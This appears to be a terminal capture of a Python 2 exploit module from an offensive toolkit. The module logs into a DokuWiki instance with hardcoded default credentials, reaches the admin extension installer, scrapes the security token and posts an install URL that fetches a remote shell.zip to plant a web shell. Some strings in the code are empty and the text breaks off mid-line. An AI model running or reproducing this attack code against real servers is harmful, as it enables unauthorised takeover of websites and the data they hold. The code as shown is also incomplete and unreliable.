c@kali:~/src/napalm2.2/modules$ cat shell-dokuwiki.py #!/usr/bin/env python # shell-dokuwiki.py - module to upload shell, based on previous version # created 28.04.2017. Bug ('feature') is exploitable only # when you will have a valid credentials. # for this proof-of-concept you'll also need host with you.r/shell.zip # import sys import re import requests print '[+] Module : dokuwiki - started.' print target = raw_input("[+] Hostname> ") logMe = target + '/doku.php?id=start&do=login§ok=' print session = requests.session() login_data = dict(u='user', p='bitnami') req = session.post(logMe, data=login_data) # 2nd req: afterPage = target + '/doku.php?id=start&do=admin&page=extension&tab=install' req2 = session.get(afterPage) resp = req2.text if 'Log Out' in resp: print '[+] We are logged-in as admin. Preparing shell...' req3 = session.get(afterPage) resp3 = req3.text pattern = re.compile('') found = re.search(pattern, resp3) if found: sectok = found.group(1) print '[+] Found "sectok":' + str( sectok ) print '[+] Preparing shell params to upload' data_shell = { 'sectok':sectok, 'installurl':'' } reqshell = session.post(afterPage, data=data_shell) respshell = reqshell.text md5name = re.compile('